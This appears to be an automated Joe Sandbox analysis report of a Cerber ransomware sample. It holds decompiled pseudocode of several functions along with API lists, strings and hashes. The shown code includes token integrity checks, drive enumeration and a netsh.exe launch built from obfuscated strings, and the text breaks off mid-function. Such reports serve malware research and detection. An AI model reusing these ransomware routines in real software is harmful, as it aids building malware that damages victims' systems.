0x00405449
0x004053ff
0x00405408
0x00000000
0x00000000
0x00405413
0x00405419
0x0040541c
0x0040541e
0x00000000
0x00000000
0x00405420
0x0040542d
0x00000000
0x0040542d
0x00405415
0x00000000
0x00405415

APIs

GetLastError.KERNEL32(00000000,00000000,00402F19,?,00405A60,?,00000000,00402E81,00402F19), ref: 004053D2

Part of subcall function 0040521D: GetCurrentProcessId.KERNEL32(0040534D,?,?,004053BB,00000008,00405875,?,00000000,?,?,?,00405918,?,?,?,00000000), ref: 0040521D

SetLastError.KERNEL32(00000000,?,00405A60,?,00000000,00402E81,00402F19), ref: 00405457

Part of subcall function 004052DB: HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,00405356,?,?,004053BB,00000008,00405875,?,00000000), ref: 004052F7
Part of subcall function 004052DB: HeapSetInformation.KERNEL32(00000000,00000000,00000000,00000004,?,?,00405356,?,?,004053BB,00000008,00405875,?,00000000), ref: 00405316
Part of subcall function 004052DB: GetCurrentProcessId.KERNEL32(?,?,00405356,?,?,004053BB,00000008,00405875,?,00000000,?,?,?,00405918,?,?), ref: 0040531C

RtlReAllocateHeap.NTDLL(00000008,?,0000000C), ref: 0040542D
RtlAllocateHeap.NTDLL(00000008,0000000C), ref: 00405441

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCurrentErrorLastProcess$CreateInformation
String ID:
API String ID: 2700697227-0
Opcode ID: 5e42c8e7b403c25a8e0d9805a945b71aec9dd386c3cc86fb145e832e39bc8926
Instruction ID: 60861b4cb21ab03a9d491da3f7eb1cca335a308e405506aebc7ad154f13da930
Opcode Fuzzy Hash: 5e42c8e7b403c25a8e0d9805a945b71aec9dd386c3cc86fb145e832e39bc8926
Instruction Fuzzy Hash: A101A131600E019BDB217BA5AC85BAB73A8DB00745744007FE801BA2D2EBB99C895E5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040533B Relevance: 6.0, APIs: 4, Instructions: 47
memoryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040533B(void* __ecx, void* __edi, long _a4) {
				long _v8;
				void* _t16;
				void* _t22;
				void* _t27;
				void* _t29;

				_t27 = __edi;
				_t24 = __ecx;
				_push(__ecx);
				_v8 = GetLastError();
				if(E0040521D() == 0) {
					E004052DB(_t24); // executed
				}
				_t22 = 0;
				if(_t27 != 0) {
					_t2 = _t27 + 2; // 0x16
					_t29 = E004051F5(_t24, _t2);
					_t3 = _t29 + 0xc; // 0xc
					_t16 = RtlAllocateHeap( *0x42f808, _a4, _t3); // executed
					if(_t16 != 0) {
						_t22 = E00405329(_t16, _t29);
						if((_a4 & 0x00000008) == 0) {
							memset(_t22 + _t27, 0, _t29 - _t27);
						}
						if(_t22 != 0) {
							SetLastError(_v8);
						}
					}
				}
				return _t22;
			}

0x0040533b
0x0040533b
0x0040533e
0x00405345
0x0040534f
0x00405351
0x00405351
0x00405357
0x0040535b
0x0040535d
0x00405368
0x0040536a
0x00405377
0x0040537f
0x0040538c
0x0040538e
0x00405399
0x0040539e
0x004053a3
0x004053a8
0x004053a8
0x004053a3
0x004053ae
0x004053b3

APIs

GetLastError.KERNEL32(?,?,004053BB,00000008,00405875,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10), ref: 0040533F

Part of subcall function 0040521D: GetCurrentProcessId.KERNEL32(0040534D,?,?,004053BB,00000008,00405875,?,00000000,?,?,?,00405918,?,?,?,00000000), ref: 0040521D

RtlAllocateHeap.NTDLL(?,0000000C,?), ref: 00405377
memset.NTDLL ref: 00405399
SetLastError.KERNEL32(00000000,?,?,004053BB,00000008,00405875,?,00000000,?,?,?,00405918,?,?,?,00000000), ref: 004053A8

Part of subcall function 004052DB: HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,00405356,?,?,004053BB,00000008,00405875,?,00000000), ref: 004052F7
Part of subcall function 004052DB: HeapSetInformation.KERNEL32(00000000,00000000,00000000,00000004,?,?,00405356,?,?,004053BB,00000008,00405875,?,00000000), ref: 00405316
Part of subcall function 004052DB: GetCurrentProcessId.KERNEL32(?,?,00405356,?,?,004053BB,00000008,00405875,?,00000000,?,?,?,00405918,?,?), ref: 0040531C

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: Heap$CurrentErrorLastProcess$AllocateCreateInformationmemset
String ID:
API String ID: 3762545016-0
Opcode ID: f8a36282de33a118b0e3e3b4a1a5650a6279c3d7d066af10e21ffce48dc56cd7
Instruction ID: ce92fe84d581c274f0df690b864ad1bc2663d76769bd6b62b0cd724ef4544cd3
Opcode Fuzzy Hash: f8a36282de33a118b0e3e3b4a1a5650a6279c3d7d066af10e21ffce48dc56cd7
Instruction Fuzzy Hash: 7601A732500605ABCB206BA5DD45B9B7BACDF44388F00407EFC01F2191EBB9D9089E5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040186A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0040186A(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				char _v8;
				char _v276;
				void* _t23;
				void* _t26;
				void* _t27;
				void* _t30;
				void* _t32;

				_t41 = __eflags;
				_t31 = __edi;
				_t30 = __edx;
				_t25 = __ecx;
				_t24 = __ebx;
				E00405F6B(__ecx, __eflags,  &_v8);
				 *((intOrPtr*)(_t32 - 0x114)) = 0x104;
				GetSystemDirectoryA( &_v276, ??);
				_push( &_v276);
				wsprintfA("C:\\Windows\\system32\\netsh.exe", E00405905(0x40cff8, 0xc, 0x2aa4a3d7));
				E0040137F(__ebx, _t25, __edi, _t41, E00405905(0x40d008, 0x18, 0xb4a6dea5)); // executed
				_pop(_t26);
				E0040137F(__ebx, _t26, __edi, _t41, E00405905(0x40d024, 5, 0xfc5a18c0)); // executed
				_pop(_t27);
				E004017EC(__ebx, _t27, _t30, __edi, _t41, _a4, E0040591C(0x40d02c, 0xf, 0xb361f514)); // executed
				E004017EC(__ebx, _t27, _t30, __edi, _t41, _a4, E0040591C(0x40d03c, 0x12, 0xa8d890bb)); // executed
				_t23 = E004017EC(_t24, _t27, _t30, _t31, _t41, _a4, E0040591C(0x40d050, 0x10, 0x81c6a2e2)); // executed
				return _t23;
			}

0x0040186a
0x0040186a
0x0040186a
0x0040186a
0x0040186a
0x00401877
0x00401882
0x0040188a
0x00401896
0x004018b1
0x004018cf
0x004018d4
0x004018ea
0x004018ef
0x00401908
0x00401925
0x00401942
0x0040194a

APIs

Part of subcall function 00405F6B: GetModuleHandleA.KERNEL32(00000000,?,?,00000000,C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe,0040833D,?,?,?,?,?,?,?,00000000), ref: 00405FA1
Part of subcall function 00405F6B: GetProcAddress.KERNEL32(00000000), ref: 00405FA8

GetSystemDirectoryA.KERNEL32(?,?), ref: 0040188A
wsprintfA.USER32 ref: 004018B1

Part of subcall function 0040137F: memset.NTDLL ref: 004013B8
Part of subcall function 0040137F: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004013DD
Part of subcall function 0040137F: WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,?,?,?,?,00000000), ref: 004013EF
Part of subcall function 0040137F: TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00401400
Part of subcall function 0040137F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401409
Part of subcall function 0040137F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401412

Strings

C:\Windows\system32\netsh.exe, xrefs: 004018AC

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: Handle$CloseProcess$AddressCreateDirectoryModuleObjectProcSingleSystemTerminateWaitmemsetwsprintf
String ID: C:\Windows\system32\netsh.exe
API String ID: 307263144-1698292435
Opcode ID: 15e6b6e0acbb50e8ab7960b3f29334ac1dc589ca9ea0ba573fad60bcdb7bf4e1
Instruction ID: 255fbad84316beb51453b9837b04682ca2b29f5d2e99bd22823ad66c03b268c6
Opcode Fuzzy Hash: 15e6b6e0acbb50e8ab7960b3f29334ac1dc589ca9ea0ba573fad60bcdb7bf4e1
Instruction Fuzzy Hash: 5F11A9F1D40608BBE61037A19C47FAF3B5CDB1474CF11043AB908B50D3E9BD5A6959AE

Uniqueness

Uniqueness Score: -1.00%

Function 00405568 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON

Download Yara Rule

APIs

shutdown.WS2_32(av@,00000002), ref: 0040556E
closesocket.WS2_32(?), ref: 00405578

Strings

av@, xrefs: 0040556A

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: closesocketshutdown
String ID: av@
API String ID: 572888783-3119376357
Opcode ID: cc947e4da2cd926d8f72edfa744815291745d11b9b859c304ff0b658672672c5
Instruction ID: ae5811c37d22f4f0b61787900125bfdb5bb523f9631432ff431403366cf658b5
Opcode Fuzzy Hash: cc947e4da2cd926d8f72edfa744815291745d11b9b859c304ff0b658672672c5
Instruction Fuzzy Hash: 93B00271544211ABDF215F52DF0EA197E61BBC4741F448CA8B29968071C7B24861FB16

Uniqueness

Uniqueness Score: -1.00%

Function 00401647 Relevance: 4.6, APIs: 3, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00401647(void* __edx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				char _v5;
				void* _v12;
				void* _v16;
				char _v20;
				intOrPtr _v28;
				char _v36;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t44;
				void* _t52;
				void* _t56;
				intOrPtr* _t58;
				void* _t80;
				void* _t81;
				void* _t85;
				void* _t86;
				void* _t87;
				void* _t88;

				_t81 = __edi;
				_t80 = __edx;
				_t1 = _t81 + 8; // 0x26a16d68
				_v16 = 0;
				_push( &_v16);
				_push(0);
				_push(0x30);
				_push(_a8);
				_v5 = 0;
				_t44 = E0040591C(0x40cf44, 3, 0x95ba59f4);
				_t87 = _t86 + 0xc;
				_push(_t44);
				_t6 = _t81 + 8; // 0x26a16d68, executed
				_push( *_t6);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t1)) + 0x50))() >= 0) {
					while(_v16 != 0) {
						_v20 = 0;
						 *((intOrPtr*)( *_v16 + 0x10))(_v16, 0xffffffff, 1,  &_v12,  &_v20);
						if(_v20 != 0) {
							_t83 =  *_v12;
							_push(0);
							_push(0);
							_push( &_v36);
							_push(0);
							_t52 = E0040591C(0x40cf48, 0x16, 0xdbed4375);
							_t88 = _t87 + 0xc;
							_push(_t52);
							_push(_v12);
							if( *((intOrPtr*)( *_v12 + 0x10))() >= 0 && _v36 == 8) {
								_v5 = 1;
								E00402B9B(0, _t80, _t81, _t83);
								_t88 = _t88 + 0x18;
								E004015BB(_v28, _t80, _t81, _t85);
								 *0x40e9f0( &_v36, _a4, _a4, E0040591C(0x40cf60, 0x1a, 0x35cc9c24), _v28);
							}
							_t84 =  *_v12;
							_push(0);
							_push(0);
							_push( &_v36);
							_push(0);
							_t56 = E0040591C(0x40cf7c, 0x18, 0x53ac65f8);
							_t87 = _t88 + 0xc;
							_push(_t56);
							_push(_v12);
							if( *((intOrPtr*)( *_v12 + 0x10))() >= 0 && _v36 == 8) {
								_v5 = 1;
								E00402B9B(0, _t80, _t81, _t84);
								_t87 = _t87 + 0x18;
								E004015BB(_v28, _t80, _t81, _t85);
								 *0x40e9f0( &_v36, _a4, _a4, E0040591C(0x40cf98, 0x1c, 0x76d74b7b), _v28);
							}
							_t58 = _v12;
							 *((intOrPtr*)( *_t58 + 8))(_t58);
							 *0x40e9f0( &_v36);
							continue;
						}
						goto L11;
					}
				}
				L11:
				return _v5;
			}

0x00401647
0x00401647
0x0040164d
0x00401654
0x0040165c
0x0040165d
0x0040165e
0x00401660
0x00401663
0x00401672
0x00401677
0x0040167a
0x0040167b
0x0040167b
0x00401683
0x004017a2
0x004016a0
0x004016a5
0x004016ab
0x004016b4
0x004016b6
0x004016b7
0x004016bb
0x004016bc
0x004016c9
0x004016ce
0x004016d1
0x004016d2
0x004016da
0x004016e6
0x00401702
0x0040170a
0x00401710
0x0040171a
0x0040171a
0x00401723
0x00401725
0x00401726
0x0040172a
0x0040172b
0x00401738
0x0040173d
0x00401740
0x00401741
0x00401749
0x00401755
0x00401771
0x00401779
0x0040177f
0x00401789
0x00401789
0x0040178f
0x00401795
0x0040179c
0x00000000
0x0040179c
0x00000000
0x004016ab
0x004017a2
0x004017ab
0x004017b1

APIs

VariantClear.OLEAUT32(00000008), ref: 0040171A
VariantClear.OLEAUT32(00000008), ref: 00401789
VariantClear.OLEAUT32(?), ref: 0040179C

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 522b1c1819fb73ec40a814644e312d63c6a7a3492c1e3534ecb8c3d05c9c2061
Instruction ID: 9f5217d57780e906635a0639c0cfcdcfb784e3fe1d0021f386375b494062b63c
Opcode Fuzzy Hash: 522b1c1819fb73ec40a814644e312d63c6a7a3492c1e3534ecb8c3d05c9c2061
Instruction Fuzzy Hash: B0415DB1940219BFDF00AF94CC85EAEBB78FF04308F00456AF911B72D1D7799A598B65

Uniqueness

Uniqueness Score: -1.00%

Function 004060A3 Relevance: 4.6, APIs: 3, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E004060A3(void* __ecx, char* _a4, void* _a8) {
				int _v8;
				void* _v12;
				void* __esi;
				int _t8;
				int _t11;
				int _t17;
				int _t20;
				int _t24;
				void* _t27;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t20 = 0;
				_t8 = GetFileVersionInfoSizeA(_a4, 0); // executed
				_t24 = _t8;
				if(_t24 != 0) {
					_t27 = E004053BD(_t22);
					if(_t27 != 0) {
						_t11 = GetFileVersionInfoA(_a4, 0, _t24, _t27); // executed
						if(_t11 != 0) {
							_push( &_v8);
							_push( &_v12);
							_push(E00405905(0x40d3a0, 1, 0xfadad64a));
							_push(_t27);
							if( *0x40e168() != 0) {
								_t17 = _v8;
								if(_t17 > 0x34) {
									_t17 = 0x34;
								}
								memcpy(_a8, _v12, _t17);
								_t20 = 1;
							}
						}
						E00405463(_t27);
					}
				}
				return _t20;
			}

0x004060a3
0x004060a6
0x004060a7
0x004060aa
0x004060b0
0x004060b6
0x004060ba
0x004060c2
0x004060c6
0x004060ce
0x004060d6
0x004060db
0x004060df
0x004060f4
0x004060f5
0x004060fe
0x00406100
0x00406106
0x0040610a
0x0040610a
0x00406112
0x0040611a
0x0040611a
0x004060fe
0x0040611c
0x0040611c
0x00406121
0x00406127

APIs

GetFileVersionInfoSizeA.KERNELBASE(00406186,00000000,00430728,?,?,?,?,00406186,00000000,?,?,00000064), ref: 004060B0
GetFileVersionInfoA.KERNELBASE(00406186,00000000,00000000,00000000,00000001,?,?,?,?,00406186,00000000,?,?,00000064), ref: 004060CE
memcpy.NTDLL(?,00406186,00000000,?,00406186,00000000,?,?,00000064), ref: 00406112

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: FileInfoVersion$Sizememcpy
String ID:
API String ID: 4130575638-0
Opcode ID: 7c0d1d1338af05a15d2546e88fa887c843bb31a21d7c274e246a8b7fb8ad1e02
Instruction ID: 449c8aad864a650708bbe3ccfa1baa80ae95fa732491fbb87c8b7e442310dca9
Opcode Fuzzy Hash: 7c0d1d1338af05a15d2546e88fa887c843bb31a21d7c274e246a8b7fb8ad1e02
Instruction Fuzzy Hash: C701FC72600008BFEB106BA1DC86DEF3B5DDB41394B050437F901FA191D77A8E508AA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A150 Relevance: 4.5, APIs: 3, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A150(WCHAR* _a4) {
				short _v1044;
				int _t5;
				int _t12;

				_t5 = GetDriveTypeW(_a4); // executed
				_t12 = _t5;
				if(_t12 >= 2 && (_t12 <= 3 || _t12 == 6) && QueryDosDeviceW(_a4,  &_v1044, 0x208) != 0 && StrCmpNW( &_v1044, E0040591C( &E0040D8A8, 4, 0xf6d853a4), 4) == 0) {
					_t12 = 1;
				}
				return _t12;
			}

0x0040a15d
0x0040a163
0x0040a168
0x0040a1b7
0x0040a1b7
0x0040a1bc

APIs

GetDriveTypeW.KERNEL32(00000000,00000000), ref: 0040A15D
QueryDosDeviceW.KERNEL32(00000000,?,00000208), ref: 0040A183
StrCmpNW.SHLWAPI(?,00000000,?,?,00000004), ref: 0040A1AB

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: DeviceDriveQueryType
String ID:
API String ID: 1681518211-0
Opcode ID: 4b148df9ae91c5ba2482056e9ee7b3809aa57e2fd434fc04b6390f61eb416309
Instruction ID: b50e7e1ea01d827a664b47746907d113240531ed754b66fccc48f788dd9396a9
Opcode Fuzzy Hash: 4b148df9ae91c5ba2482056e9ee7b3809aa57e2fd434fc04b6390f61eb416309
Instruction Fuzzy Hash: 0CF0F072E00228A6DB303A648C09E9B762C9B00B54F040532FE14FA2D0E6748DA885CD

Uniqueness

Uniqueness Score: -1.00%

Function 00402DDE Relevance: 4.5, APIs: 3, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00402DDE() {
				void* _v8;
				void* __ecx;
				void* _t10;
				void* _t12;
				void* _t14;
				void* _t18;

				_t14 = 0;
				_v8 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 0xa,  &_v8) == 0) {
					L8:
					return _t14;
				}
				_push(_v8);
				if( *0x43072c < 6) {
					_t10 = E00402D06();
					L5:
					if(_t10 != 0) {
						_t14 = 1;
					}
					L7:
					CloseHandle(_v8);
					goto L8;
				}
				_t12 = E00402D06(); // executed
				_pop(_t18);
				if(_t12 == 0) {
					goto L7;
				}
				_t10 = E00402DB2(_t18, _v8); // executed
				goto L5;
			}

0x00402de7
0x00402deb
0x00402dfd
0x00402e34
0x00402e38
0x00402e38
0x00402e06
0x00402e09
0x00402e1f
0x00402e24
0x00402e27
0x00402e29
0x00402e29
0x00402e2b
0x00402e2e
0x00000000
0x00402e2e
0x00402e0b
0x00402e10
0x00402e13
0x00000000
0x00000000
0x00402e18
0x00000000

APIs

GetCurrentProcess.KERNEL32(0000000A,?,?,?,?,0040811E,00000000,?,?,?,?,004065A6,00000000), ref: 00402DEE
OpenProcessToken.ADVAPI32(00000000,?,?,?,0040811E,00000000,?,?,?,?,004065A6,00000000), ref: 00402DF5
CloseHandle.KERNEL32(?,?,?,?,0040811E,00000000,?,?,?,?,004065A6,00000000), ref: 00402E2E

Part of subcall function 00402D06: GetTokenInformation.KERNELBASE(?,00000012(TokenIntegrityLevel),?,00000004,?,00000000), ref: 00402D30
Part of subcall function 00402D06: GetTokenInformation.ADVAPI32(?,00000013(TokenIntegrityLevel),?,00000004,?), ref: 00402D4F
Part of subcall function 00402D06: DuplicateToken.ADVAPI32(?,00000001,?,00000000), ref: 00402D67
Part of subcall function 00402D06: CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?), ref: 00402D83
Part of subcall function 00402D06: CheckTokenMembership.ADVAPI32(?,?,?), ref: 00402D98
Part of subcall function 00402D06: FindCloseChangeNotification.KERNEL32(?), ref: 00402DA1

Part of subcall function 00402DB2: GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,00000000,?,?,?,00402E1D,?,?,?,?,0040811E,00000000), ref: 00402DC9

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: Token$Information$CloseProcess$ChangeCheckCreateCurrentDuplicateFindHandleKnownMembershipNotificationOpenWell
String ID:
API String ID: 1240585583-0
Opcode ID: 248482eb807f76892f9d049e9d38bd24e7e029077d2cc3bc76471740b8d43eb3
Instruction ID: e8ce22f645738a416db643b232aefe13eabb038650c169b39ca4f9c89f3ecb12
Opcode Fuzzy Hash: 248482eb807f76892f9d049e9d38bd24e7e029077d2cc3bc76471740b8d43eb3
Instruction Fuzzy Hash: 07F08935540205EFCF25AFA1DF5D69E7729EF01348710407FE502766E1C7B68D089A59

Uniqueness

Uniqueness Score: -1.00%

Function 004052DB Relevance: 4.5, APIs: 3, Instructions: 27
memoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E004052DB(void* __ecx) {
				char _v8;
				void* _t4;
				long _t6;

				if(E0040521D() == 0) {
					L2:
					_t4 = HeapCreate(0, 0, 0); // executed
					 *0x42f808 = _t4;
					if(_t4 != 0) {
						_v8 = 2;
						 *0x40f25c(_t4, 0,  &_v8, 4);
						_t6 = GetCurrentProcessId();
						 *0x42f80c = _t6;
						return _t6;
					}
				} else {
					_t4 = E0040528D();
					if(_t4 == 0) {
						goto L2;
					}
				}
				return _t4;
			}

0x004052e6
0x004052f1
0x004052f7
0x004052fd
0x00405304
0x0040530f
0x00405316
0x0040531c
0x00405322
0x00000000
0x00405322
0x004052e8
0x004052e8
0x004052ef
0x00000000
0x00000000
0x004052ef
0x00405328

APIs

Part of subcall function 0040521D: GetCurrentProcessId.KERNEL32(0040534D,?,?,004053BB,00000008,00405875,?,00000000,?,?,?,00405918,?,?,?,00000000), ref: 0040521D

HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,00405356,?,?,004053BB,00000008,00405875,?,00000000), ref: 004052F7
HeapSetInformation.KERNEL32(00000000,00000000,00000000,00000004,?,?,00405356,?,?,004053BB,00000008,00405875,?,00000000), ref: 00405316
GetCurrentProcessId.KERNEL32(?,?,00405356,?,?,004053BB,00000008,00405875,?,00000000,?,?,?,00405918,?,?), ref: 0040531C

Part of subcall function 0040528D: GetProcessHeaps.KERNEL32(000000FF,?,?,00000000), ref: 004052AC

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: Process$CurrentHeap$CreateHeapsInformation
String ID:
API String ID: 3179415709-0
Opcode ID: f4d2fe047154c820b9d04e58fef47c53acbd2844d057b6373e8296822e6be4ef
Instruction ID: 23e59799b477871dd03203e7d772dc5f3eff58e84d09700a679526b41974071e
Opcode Fuzzy Hash: f4d2fe047154c820b9d04e58fef47c53acbd2844d057b6373e8296822e6be4ef
Instruction Fuzzy Hash: BEE0E574140704AADB20AF61ED06B5777A4EB05745F9040BDFA01B62E1DBB595088E6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405463 Relevance: 4.5, APIs: 3, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00405463(void* __esi) {
				void* _t5;
				long _t6;
				char _t7;
				void* _t8;
				void* _t9;
				long _t14;
				void* _t16;

				_t16 = __esi;
				_t5 = E0040521D();
				_t17 = _t5;
				if(_t5 != 0) {
					_t6 = GetLastError();
					_push(__esi);
					_t14 = _t6;
					_t7 = E0040522F(_t9, __esi, _t17);
					if(_t7 != 0) {
						_t1 = _t16 - 8; // -8
						_t8 = _t1;
						 *((intOrPtr*)(_t8 + 4)) = 0xdeadbeef;
						 *((intOrPtr*)( *_t8 + _t8 + 8)) = 0xdeadbeef;
						_t7 = RtlFreeHeap( *0x42f808, 0, _t8); // executed
					}
					SetLastError(_t14);
					return _t7;
				}
				return _t5;
			}

0x00405463
0x00405463
0x00405468
0x0040546a
0x0040546d
0x00405473
0x00405474
0x00405476
0x0040547e
0x00405480
0x00405480
0x00405493
0x00405496
0x0040549a
0x0040549a
0x004054a1
0x00000000
0x004054a7
0x004054a8

APIs

Part of subcall function 0040521D: GetCurrentProcessId.KERNEL32(0040534D,?,?,004053BB,00000008,00405875,?,00000000,?,?,?,00405918,?,?,?,00000000), ref: 0040521D

GetLastError.KERNEL32(00000000,00405722), ref: 0040546D

Part of subcall function 0040522F: HeapValidate.KERNEL32(00000000,?,0040D988,0000000C,0040547B,00000000), ref: 00405252

RtlFreeHeap.NTDLL(00000000,-00000008), ref: 0040549A
SetLastError.KERNEL32(00000000), ref: 004054A1

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: ErrorHeapLast$CurrentFreeProcessValidate
String ID:
API String ID: 1604491510-0
Opcode ID: dbc678ea5d9c0626ecbb90ad8326887dd0f71650410c463631faa0dbcd0d6e46
Instruction ID: 88a8954fb70d2862f9babb8fa3ca0a82616e00d93f94b9d4758e7abe23009c6a
Opcode Fuzzy Hash: dbc678ea5d9c0626ecbb90ad8326887dd0f71650410c463631faa0dbcd0d6e46
Instruction Fuzzy Hash: D8E092350002019BC720AF54E908A6B77A9EF89325B4480BEF401E73A1CB39848A8E1C

Uniqueness

Uniqueness Score: -1.00%

Function 00403988 Relevance: 3.9, APIs: 3, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00403988(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				int _t30;
				int _t32;
				char _t35;
				char* _t37;
				int _t40;
				int _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				int _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				char* _t60;

				_push(0xeed5962f);
				_t53 = 4;
				_push(_t53);
				_push(0x40d2b8);
				_t60 = E004033A7(_a8, _a12, E00405905());
				if(_t60 != 0) {
					_t30 = StrCmpNIA(_t60, E00405905(0x40d2b0, _t53, 0xe53c37de), _t53);
					_t69 = _t30;
					if(_t30 != 0) {
						_t45 = 5;
						_t32 = StrCmpNIA(_t60, E00405905(0x40d2a0, _t45, 0xf9b19ebb), _t45);
						__eflags = _t32;
						if(__eflags != 0) {
							__eflags = StrCmpNIA(_t60, E00405905(0x40d298, _t53, 0xc25ee221), _t53);
							if(__eflags != 0) {
								_t35 =  *_t60;
								__eflags = _t35 - 0x22;
								if(__eflags != 0) {
									__eflags = _t35 - 0x2d;
